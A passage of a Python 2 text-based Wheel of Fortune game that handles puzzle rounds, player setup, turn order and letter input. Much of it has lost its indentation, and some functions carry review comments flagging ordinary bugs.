print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
if type(prize) == int:
print playerOrder[j + 1] + " now takes possession of The Wheel."
else:
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
if type(prize) == int:
break
if prize == "bankrupt":
print ""
print playerOrder[j], "spun for BANKRUPT, bringing his total prize for this round to $0."
playerOrder_val_round[j][0] = 0
print "Possession of The Wheel passes to", playerOrder[(j + 1)] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if prize == "loseATurn":
print ""
print playerOrder[j], "spun for LOSE A TURN!"
print "Sorry, " + playerOrder[j] + ". Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if selection == 0:
guess = get_guessWord()
if guess == hidden_word:
incom_word = guess
break
else:
print "Sorry, " + playerOrder[j] + ". That is not the correct puzzle solution."
print "Possession of the Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
break
if incom_word == hidden_word:
## print "j is equal to:", j
playerOrder_val[j][0] = playerOrder_val_round[j][0] + playerOrder_val[j][0]
print "Congratulations,", playerOrder[j] + ". You correctly solved the puzzle:", string.upper(hidden_word) + "."
break
## if incom_word == hidden_word:
## break
break
return playerOrder_val
def round_two(playerOrder, playerOrder_val):
## print "playerOrder_val is equal to:", playerOrder_val
game_round = 1
hidden_word = choose_word(wordlist).lower()
playerOrder_val_round = [[0, 0], [0, 0], [0, 0]]
alpha = string.ascii_lowercase
disp_word = "_ " * len(hidden_word)
incom_word = "_" * len(hidden_word)
## print "The hidden_word is:", hidden_word
counter = 0
countDown = 11
while countDown > 0:
## for i in range(counter):
## counter -= 1
## print "counter is equal to:", counter
print ""
print "The second round puzzle is:", disp_word
for j in [0, 1, 2, 0, 1, 2, 0, 1, 2, 0]:
## counter -= 1
## print "counter is equal to:", counter
possession = True
if countDown == 0:
break
while possession == True:
countDown -= 1
if countDown == 0:
break
## print "counter is equal to:", counter
selection = 0
if counter > 0:
print disp_word
counter += 1
print ""
print "Remaining letters are:", str(string.upper(alpha))
print ""
selection = get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round)
if selection == 3:
print ""
print "You chose to buy a vowel."
print ""
playerOrder_val_round[j][0] = (playerOrder_val_round[j][0] - 250)
guess = get_guessVowel()
guess = string.lower(guess)
if guess in alpha:
alpha = alpha.replace(guess, "")
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
print playerOrder[j + 1] + " now takes possession of The Wheel."
print ""
## possession = False
break
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0 or letter_app == 1:
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print ""
possession = False
break
if letter_app == 1:
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "Good guess,", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
if selection == 1:
prize = get_prize(game_round)
subPrize = prize
if (type(prize) is int) or (prize == "freePlay"):
freePlay_choice = 0
if type(prize) is int:
print ""
print playerOrder[j] + " spun for $" + str(prize) + "!"
print ""
if prize is "freePlay":
print ""
print playerOrder[j], "spun for a FREE PLAY!"
print playerOrder[j] + ", you may solve or guess a letter (including vowels) without penalty."
print ""
selection_freePlay = get_freePlayChoice(playerOrder, j)
subPrize = 500
if selection_freePlay == 1:
guess = get_guessfreePlay()
if selection_freePlay == 2:
guess_word = get_guessWord()
if guess_word == hidden_word:
incom_word = guess_word
possession = True
break
else:
print ""
print "Sorry, that is not the solution to the puzzle."
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
guess = 1
if type(prize) is int:
guess = get_guessConsonant()
if type(guess) == str:
guess = string.lower(guess)
if guess != 1:
if guess in alpha:
alpha = alpha.replace(guess, "")
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word or prize == "freePlay":
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print string.center(("-" * 80), 80)
print ""
possession = False
break
if letter_app == 1:
print disp_word
print ""
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print "That adds $" + str(subPrize) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if letter_app >= 2:
print disp_word
print ""
print "Good guess:", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print "That adds $" + str(subPrize * letter_app) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if incom_word == hidden_word:
break
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j] + "."
possession = False
break
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
if type(prize) == int:
print playerOrder[j + 1] + " now takes possession of The Wheel."
else:
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
if type(prize) == int:
break
if prize == "bankrupt":
print ""
print playerOrder[j], "spun for BANKRUPT, bringing his total prize for this round to $0."
playerOrder_val_round[j][0] = 0
print "Possession of The Wheel passes to", playerOrder[(j + 1)] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if prize == "loseATurn":
print ""
print playerOrder[j], "spun for LOSE A TURN!"
"Sorry, " + playerOrder[j] + ". Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if selection == 0:
guess = get_guessWord()
if guess == hidden_word:
incom_word = guess
break
else:
print "Sorry, " + playerOrder[j] + ". That is not the correct puzzle solution."
print "Possession of the Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
break
if incom_word == hidden_word:
## print "j is equal to:", j
playerOrder_val[j][0] = playerOrder_val_round[j][0] + playerOrder_val[j][0]
print "Congratulations,", playerOrder[j] + ". You correctly solved the puzzle:", string.upper(hidden_word) + "."
break
## if incom_word == hidden_word:
## break
break
return playerOrder_val
def round_three(playerOrder, playerOrder_val):
## print "playerOrder_val is equal to:", playerOrder_val
game_round = 1
hidden_word = choose_word(wordlist).lower()
playerOrder_val_round = [[0, 0], [0, 0], [0, 0]]
alpha = string.ascii_lowercase
disp_word = "_ " * len(hidden_word)
incom_word = "_" * len(hidden_word)
## print "The hidden_word is:", hidden_word
counter = 0
countDown = 11
while countDown > 0:
## for i in range(counter):
## counter -= 1
## print "counter is equal to:", counter
print ""
print "The third round puzzle is:", disp_word
for j in [0, 1, 2, 0, 1, 2, 0, 1, 2, 0]:
## counter -= 1
## print "counter is equal to:", counter
possession = True
if countDown == 0:
break
while possession == True:
countDown -= 1
if countDown == 0:
break
## print "counter is equal to:", counter
selection = 0
if counter > 0:
print disp_word
counter += 1
print ""
print "Remaining letters are:", str(string.upper(alpha))
print ""
selection = get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round)
if selection == 3:
print ""
print "You chose to buy a vowel."
print ""
playerOrder_val_round[j][0] = (playerOrder_val_round[j][0] - 250)
guess = get_guessVowel()
guess = string.lower(guess)
if guess in alpha:
alpha = alpha.replace(guess, "")
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
print playerOrder[j + 1] + " now takes possession of The Wheel."
print ""
## possession = False
break
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word:
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0 or letter_app == 1:
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print ""
possession = False
break
if letter_app == 1:
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "Good guess,", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print ""
print string.center(("-" * 80), 80)
print ""
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
possession = False
break
if selection == 1:
prize = get_prize(game_round)
subPrize = prize
if (type(prize) is int) or (prize == "freePlay"):
freePlay_choice = 0
if type(prize) is int:
print ""
print playerOrder[j] + " spun for $" + str(prize) + "!"
print ""
if prize is "freePlay":
print ""
print playerOrder[j], "spun for a FREE PLAY!"
print playerOrder[j] + ", you may solve or guess a letter (including vowels) without penalty."
print ""
selection_freePlay = get_freePlayChoice(playerOrder, j)
subPrize = 500
if selection_freePlay == 1:
guess = get_guessfreePlay()
if selection_freePlay == 2:
guess_word = get_guessWord()
if guess_word == hidden_word:
incom_word = guess_word
possession = True
break
else:
print ""
print "Sorry, that is not the solution to the puzzle."
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
guess = 1
if type(prize) is int:
guess = get_guessConsonant()
if type(guess) == str:
guess = string.lower(guess)
if guess != 1:
if guess in alpha:
alpha = alpha.replace(guess, "")
print ""
print string.center(("-" * 80), 80)
print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
raw_input(string.center(("-" * 80), 80))
print ""
if guess in hidden_word or prize == "freePlay":
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
letter_app = 0
for i in range(len(hidden_word)):
if hidden_word[i] == guess:
letter_app += 1
if letter_app == 0:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print string.center(("-" * 80), 80)
print ""
possession = False
break
if letter_app == 1:
print disp_word
print ""
print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
print "That adds $" + str(subPrize) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if letter_app >= 2:
print disp_word
print ""
print "Good guess:", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
print "That adds $" + str(subPrize * letter_app) + " to your total prize score!"
print ""
playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
print string.center(("-" * 80), 80)
print ""
print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
print ""
raw_input(string.center(("-" * 80), 80))
print ""
possession = True
if incom_word == hidden_word:
break
else:
print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
if prize == "freePlay":
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
else:
print "Possession of The Wheel passes to " + playerOrder[j] + "."
possession = False
break
else:
print ""
print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
if type(prize) == int:
print playerOrder[j + 1] + " now takes possession of The Wheel."
else:
print "Your Free Play spin, however, means that you keep possession of The Wheel."
print ""
if type(prize) == int:
break
if prize == "bankrupt":
print ""
print playerOrder[j], "spun for BANKRUPT, bringing his total prize for this round to $0."
playerOrder_val_round[j][0] = 0
print "Possession of The Wheel passes to", playerOrder[(j + 1)] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if prize == "loseATurn":
print ""
print playerOrder[j], "spun for LOSE A TURN!"
"Sorry, " + playerOrder[j] + ". Possession of The Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
print ""
break
if selection == 0:
guess = get_guessWord()
if guess == hidden_word:
incom_word = guess
break
else:
print "Sorry, " + playerOrder[j] + ". That is not the correct puzzle solution."
print "Possession of the Wheel passes to " + playerOrder[j + 1] + "."
print ""
raw_input(string.center(("-" * 80), 80))
break
if incom_word == hidden_word:
## print "j is equal to:", j
playerOrder_val[j][0] = playerOrder_val_round[j][0] + playerOrder_val[j][0]
print "Congratulations,", playerOrder[j] + ". You correctly solved the puzzle:", string.upper(hidden_word) + "."
break
## if incom_word == hidden_word:
## break
break
return playerOrder_val
def round_four(playerOrder, playerOrder_val):
    """Play the fourth (speed-up) round and return the updated game totals.

    The round runs on a countdown of 11 turns. On each turn the current
    player may spin (selection 1), buy a vowel (selection 3, costs $250 of
    round winnings) or attempt to solve (selection 0). When the puzzle is
    solved, that player's round winnings are banked into playerOrder_val.
    """
    ## print "playerOrder_val is equal to:", playerOrder_val
    # NOTE(review): game_round stays 1 even though this is round four, so
    # get_prize() serves the round-one jackpot values — confirm intended.
    game_round = 1
    hidden_word = choose_word(wordlist).lower()
    # Per-round winnings: [amount, unused] for each of the three players.
    playerOrder_val_round = [[0, 0], [0, 0], [0, 0]]
    alpha = string.ascii_lowercase  # letters not yet called this round
    disp_word = "_ " * len(hidden_word)  # spaced display shown to players
    incom_word = "_" * len(hidden_word)  # unspaced progress word, compared to hidden_word
    ## print "The hidden_word is:", hidden_word
    counter = 0
    countDown = 11  # number of turns before the speed-up round ends
    while countDown > 0:
        ## for i in range(counter):
        ## counter -= 1
        ## print "counter is equal to:", counter
        print ""
        print "The fourth round puzzle is:", disp_word
        # Turn order cycles through the three players up to ten times.
        for j in [0, 1, 2, 0, 1, 2, 0, 1, 2, 0]:
            ## counter -= 1
            ## print "counter is equal to:", counter
            possession = True
            if countDown == 0:
                break
            # The current player keeps the wheel until possession is lost
            # or the countdown runs out.
            while possession == True:
                countDown -= 1
                if countDown == 0:
                    break
                ## print "counter is equal to:", counter
                selection = 0
                if counter > 0:
                    print disp_word
                counter += 1
                print ""
                print "Remaining letters are:", str(string.upper(alpha))
                print ""
                selection = get_playerSelection(playerOrder, hidden_word, disp_word, j, playerOrder_val_round)
                # --- selection 3: buy a vowel ($250 from round winnings) ---
                if selection == 3:
                    print ""
                    print "You chose to buy a vowel."
                    print ""
                    playerOrder_val_round[j][0] = (playerOrder_val_round[j][0] - 250)
                    guess = get_guessVowel()
                    guess = string.lower(guess)
                    if guess in alpha:
                        alpha = alpha.replace(guess, "")
                    else:
                        print ""
                        print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
                        print playerOrder[j + 1] + " now takes possession of The Wheel."
                        print ""
                        ## possession = False
                        break
                    print ""
                    print string.center(("-" * 80), 80)
                    print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
                    raw_input(string.center(("-" * 80), 80))
                    print ""
                    if guess in hidden_word:
                        # Reveal every occurrence in both word representations.
                        for i in range(len(hidden_word)):
                            if hidden_word[i] == guess:
                                disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
                                incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
                        letter_app = 0  # number of occurrences of the guess
                        for i in range(len(hidden_word)):
                            if hidden_word[i] == guess:
                                letter_app += 1
                        if letter_app == 0 or letter_app == 1:
                            if letter_app == 0:
                                print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
                                print ""
                                possession = False
                                break
                            if letter_app == 1:
                                print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
                                print ""
                                print string.center(("-" * 80), 80)
                                print ""
                        else:
                            print "Good guess,", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
                            print ""
                            print string.center(("-" * 80), 80)
                            print ""
                    else:
                        print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
                        print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
                        print ""
                        possession = False
                        break
                # --- selection 1: spin the wheel ---
                if selection == 1:
                    prize = get_prize(game_round)
                    subPrize = prize  # per-letter dollar value of this spin
                    if (type(prize) is int) or (prize == "freePlay"):
                        freePlay_choice = 0  # NOTE(review): assigned but never used
                        if type(prize) is int:
                            print ""
                            print playerOrder[j] + " spun for $" + str(prize) + "!"
                            print ""
                        # NOTE(review): identity test against a str literal;
                        # works only through CPython interning — should be ==.
                        if prize is "freePlay":
                            print ""
                            print playerOrder[j], "spun for a FREE PLAY!"
                            print playerOrder[j] + ", you may solve or guess a letter (including vowels) without penalty."
                            print ""
                            selection_freePlay = get_freePlayChoice(playerOrder, j)
                            subPrize = 500  # Free Play letters pay a flat $500
                            if selection_freePlay == 1:
                                guess = get_guessfreePlay()
                            if selection_freePlay == 2:
                                guess_word = get_guessWord()
                                if guess_word == hidden_word:
                                    incom_word = guess_word
                                    possession = True
                                    break
                                else:
                                    print ""
                                    print "Sorry, that is not the solution to the puzzle."
                                    print "Your Free Play spin, however, means that you keep possession of The Wheel."
                                    print ""
                                    guess = 1  # sentinel: skip letter handling below
                        if type(prize) is int:
                            guess = get_guessConsonant()
                        if type(guess) == str:
                            guess = string.lower(guess)
                        if guess != 1:
                            if guess in alpha:
                                alpha = alpha.replace(guess, "")
                                print ""
                                print string.center(("-" * 80), 80)
                                print string.center(("Vanna, does the puzzle contain any '" + guess.upper() + "'s?"), 80)
                                raw_input(string.center(("-" * 80), 80))
                                print ""
                                if guess in hidden_word or prize == "freePlay":
                                    for i in range(len(hidden_word)):
                                        if hidden_word[i] == guess:
                                            disp_word = disp_word[0:(i * 2)] + guess + disp_word[((i * 2) + 1):]
                                            incom_word = incom_word[0:i] + guess + incom_word[(i + 1):]
                                    letter_app = 0  # occurrences of the guessed letter
                                    for i in range(len(hidden_word)):
                                        if hidden_word[i] == guess:
                                            letter_app += 1
                                    if letter_app == 0:
                                        print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
                                        if prize == "freePlay":
                                            print "Your Free Play spin, however, means that you keep possession of The Wheel."
                                            print ""
                                        else:
                                            print "Possession of The Wheel passes to " + playerOrder[j + 1] + "."
                                        print string.center(("-" * 80), 80)
                                        print ""
                                        # NOTE(review): possession is dropped even on a
                                        # Free Play miss, contradicting the message above.
                                        possession = False
                                        break
                                    if letter_app == 1:
                                        print disp_word
                                        print ""
                                        print "Good guess,", playerOrder[j] + "! There is 1", guess.upper(), "in the puzzle!"
                                        print "That adds $" + str(subPrize) + " to your total prize score!"
                                        print ""
                                        playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
                                        print string.center(("-" * 80), 80)
                                        print ""
                                        print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
                                        print ""
                                        raw_input(string.center(("-" * 80), 80))
                                        print ""
                                        possession = True
                                    if letter_app >= 2:
                                        print disp_word
                                        print ""
                                        print "Good guess:", playerOrder[j] + "! There are", letter_app, "'" + guess.upper() + "'s in the puzzle!"
                                        print "That adds $" + str(subPrize * letter_app) + " to your total prize score!"
                                        print ""
                                        playerOrder_val_round[j][0] = playerOrder_val_round[j][0] + (subPrize * letter_app)
                                        print string.center(("-" * 80), 80)
                                        print ""
                                        print string.center((playerOrder[j] + "'s total prize score is now $" + str(playerOrder_val_round[j][0]) + "!"), 80)
                                        print ""
                                        raw_input(string.center(("-" * 80), 80))
                                        print ""
                                        possession = True
                                    if incom_word == hidden_word:
                                        break
                                else:
                                    print "I'm sorry", playerOrder[j] + ", but there are no '" + guess.upper() + "'s in the puzzle."
                                    if prize == "freePlay":
                                        print "Your Free Play spin, however, means that you keep possession of The Wheel."
                                        print ""
                                    else:
                                        # NOTE(review): names playerOrder[j] (the current
                                        # player); the parallel message above uses j + 1 —
                                        # likely a wrong index.
                                        print "Possession of The Wheel passes to " + playerOrder[j] + "."
                                    possession = False
                                    break
                            else:
                                print ""
                                print "Sorry, '" + string.upper(guess) + "' has already been called in this round."
                                if type(prize) == int:
                                    print playerOrder[j + 1] + " now takes possession of The Wheel."
                                else:
                                    print "Your Free Play spin, however, means that you keep possession of The Wheel."
                                print ""
                                if type(prize) == int:
                                    break
                    if prize == "bankrupt":
                        print ""
                        print playerOrder[j], "spun for BANKRUPT, bringing his total prize for this round to $0."
                        playerOrder_val_round[j][0] = 0
                        print "Possession of The Wheel passes to", playerOrder[(j + 1)] + "."
                        print ""
                        raw_input(string.center(("-" * 80), 80))
                        print ""
                        break
                    if prize == "loseATurn":
                        print ""
                        print playerOrder[j], "spun for LOSE A TURN!"
                        # NOTE(review): missing 'print' — this string is built and discarded.
                        "Sorry, " + playerOrder[j] + ". Possession of The Wheel passes to " + playerOrder[j + 1] + "."
                        print ""
                        raw_input(string.center(("-" * 80), 80))
                        print ""
                        break
                # --- selection 0: attempt to solve the puzzle ---
                if selection == 0:
                    guess = get_guessWord()
                    if guess == hidden_word:
                        incom_word = guess
                        break
                    else:
                        print "Sorry, " + playerOrder[j] + ". That is not the correct puzzle solution."
                        print "Possession of the Wheel passes to " + playerOrder[j + 1] + "."
                        print ""
                        raw_input(string.center(("-" * 80), 80))
                        break
            # Puzzle solved: bank this player's round winnings into the game total.
            if incom_word == hidden_word:
                ## print "j is equal to:", j
                playerOrder_val[j][0] = playerOrder_val_round[j][0] + playerOrder_val[j][0]
                print "Congratulations,", playerOrder[j] + ". You correctly solved the puzzle:", string.upper(hidden_word) + "."
                break
        ## if incom_word == hidden_word:
        ## break
        break
    return playerOrder_val
def end_game(players):
print "----------------------"
print "GAME OVER!"
print "----------------------"
print "Would you like to play again? (y/n)"
selection = string.lower(raw_input())
if selection == "y" or selection == "yes":
playerOrder_val = [[0, 0], [0, 0], [0, 0]]
game(players, playerOrder_val)
def get_numPlayers():
numPlayers = 0
while numPlayers <= 0 or numPlayers > 3:
print ""
print "How many contestants (max: 3) will be playing today?"
numPlayers = raw_input("Number of players: ",)
if numPlayers == "One" or numPlayers == "one" or numPlayers == "ONE" or numPlayers == "1":
numPlayers = 1
print "You have selected play for 1 player."
if numPlayers == "Two" or numPlayers == "two" or numPlayers == "TWO" or numPlayers == "2":
numPlayers = 2
print "You have selected play for 2 players."
if numPlayers == "Three" or numPlayers == "three" or numPlayers == "THREE" or numPlayers == "3":
numPlayers = 3
print "You have selected play for 3 players."
if numPlayers < 1 or numPlayers > 3 or numPlayers == type(int):
print string.center(("-" * 80), 80)
print "ERROR: INVALID PLAYER NUMBER"
raw_input (string.center(("-" * 80), 80))
return numPlayers
def get_playerNames(numPlayers, playerNames_hum, playerNames_comp):
    """Prompt each human contestant for a name and fill the rest from
    playerNames_comp; return the list of three player names.

    NOTE(review): the playerNames_hum parameter is never used.
    """
    players = ["Player 1", "Player 2", "Player 3"]
    print ""
    ## print string.center(("-" * 80), 80)
    ## print string.center(("-" * 80), 80)
    for i in range(numPlayers):
        name = ""
        # Re-prompt until a non-empty name is entered.
        while name == "":
            name = raw_input(players[i] + ", what is your name? ")
            name = name.title()
            if name == "":
                print ""
                print string.center(("-" * 80), 80)
                # NOTE(review): expandtabs with no tabs is an identity call —
                # probably meant string.center like the surrounding lines.
                print string.expandtabs("ERROR, FIELD EMPTY")
                print string.expandtabs("Please try again.")
                print string.center(("-" * 80), 80)
                print ""
        players[i] = name
    if numPlayers == 3:
        print ""
        ## print string.center(("-" * 80), 80)
        print string.center(("-" * 80), 80)
        print ""
        print "Welcome", players[0] + ",", players[1] + ", and", players[2] + "!"
        print ""
    if numPlayers == 2:
        # One computer opponent fills the third seat.
        players[2] = playerNames_comp[0]
        print ""
        ## print string.center(("-" * 80), 80)
        print "Welcome", players[0] + " and", players[1] + "! Today you will be playing against", players[2] + "."
    if numPlayers == 1:
        # Two computer opponents fill the remaining seats.
        players[1] = playerNames_comp[0]
        players[2] = playerNames_comp[1]
        print ""
        ## print string.center(("-" * 80), 80)
        print "Welcome", players[0] + "! Today you will be playing against", players[1], "and", players[2] + "."
    return players
def get_playerOrder(players, playerOrder_val):
    """Run the Toss-Up spin, rank players by the amount 'won', and return the
    player names in descending order of their spin.

    Side effect: each playerOrder_val entry becomes [amount, name] and the
    list is sorted in place (descending).

    NOTE(review): the 'spin' awards a fixed i * 100, so the third player
    always wins the toss-up — looks like placeholder logic, not randomness.
    """
    playerOrder = [0, 0, 0]
    print "We will now play the Toss-Up Puzzle for possession of The Wheel in the first"
    print "round."
    print ""
    print players[0] + " will spin first."
    print ""
    print string.center(("-" * 80), 80)
    raw_input ("Press 'ENTER' to continue: ")
    for i in (0, 1, 2):
        ## if i == 0:
        ## print ""
        ## print players[i] + " will spin first."
        print ""
        print players[i] + ", get ready. You're up next!"
        print players[i] + " prepares to spin The Wheel."
        ## print string.center(("-" * 80), 80)
        print ""
        raw_input("Press 'ENTER' to spin The Wheel. ")
        print ""
        print string.center(("-" * 80), 80)
        print string.center((players[i] + " received $" + str(i * 100) + "."), 80)
        print string.center(("-" * 80), 80)
        # Record [amount, name] so the reverse sort ranks by amount first.
        for j in (0, 1):
            if j == 0:
                playerOrder_val[i][j] = (i * 100)
            else:
                playerOrder_val[i][j] = players[i]
    playerOrder_val.sort(reverse=True)
    # Extract the names in winning order.
    for i in range(3):
        playerOrder[i] = playerOrder_val[i][1]
    print ""
    print "Congratulations,", playerOrder[0] + "! You have won the Toss-Up Spin and will take possession"
    print "of The Wheel at the beginning of the first round."
    print ""
    print playerOrder[1] + " will Take possession of The Wheel after", playerOrder[0] + ", followed by", playerOrder[2] + "."
    print ""
    print string.center(("-" * 80), 80)
    raw_input ("Press 'ENTER' to begin the first round: ")
    print ""
    return playerOrder
def get_playerOrder_val(playerOrder_val):
    """Assign each player's toss-up 'spin' amount in place and return the list.

    NOTE(review): the original referenced an undefined name ``j`` and would
    raise NameError if ever called; it looks like a half-copied, unused
    fragment of get_playerOrder's inner loop. Rewritten to set the amount
    slot for all three players, mirroring that loop.
    """
    for i in (0, 1, 2):
        playerOrder_val[i][0] = (i * 100)
    return playerOrder_val
def get_guessConsonant():
check = False
while check == False:
guess = string.lower(raw_input("Please guess a letter: ",))
if len(guess) == 1 and guess in ["b", "c", "d", "f", "g", "h", "j", "k", "l", "m", "n", "p", "q", "r", "s", "t", "v", "w", "x", "z"]:
check = True
if len(guess) != 1:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Please enter one letter per guess."
print string.center(("-" * 80) , 80)
print ""
check = False
if guess in ["a", "e", "i", "o", "u", "y"]:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Entry must be a consonant."
print string.center(("-" * 80) , 80)
print ""
check = False
return guess
def get_guessfreePlay():
check = False
while check == False:
guess = string.lower(raw_input("Please guess a letter: ",))
if len(guess) == 1 and guess in ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"]:
check = True
if len(guess) != 1:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Please enter one letter per guess."
print string.center(("-" * 80) , 80)
print ""
check = False
return guess
def get_guessVowel():
check = False
while check == False:
guess = string.lower(raw_input("Please guess a vowel: ",))
if len(guess) == 1 and guess in ["a", "e", "i", "o", "u", "y"]:
check = True
if len(guess) != 1:
print ""
print string.center(("-" * 80) , 80)
print "ERROR: INVALID ENTRY!"
print "Please enter one letter per guess."
print string.center(("-" * 80) , 80)
print ""
check = False
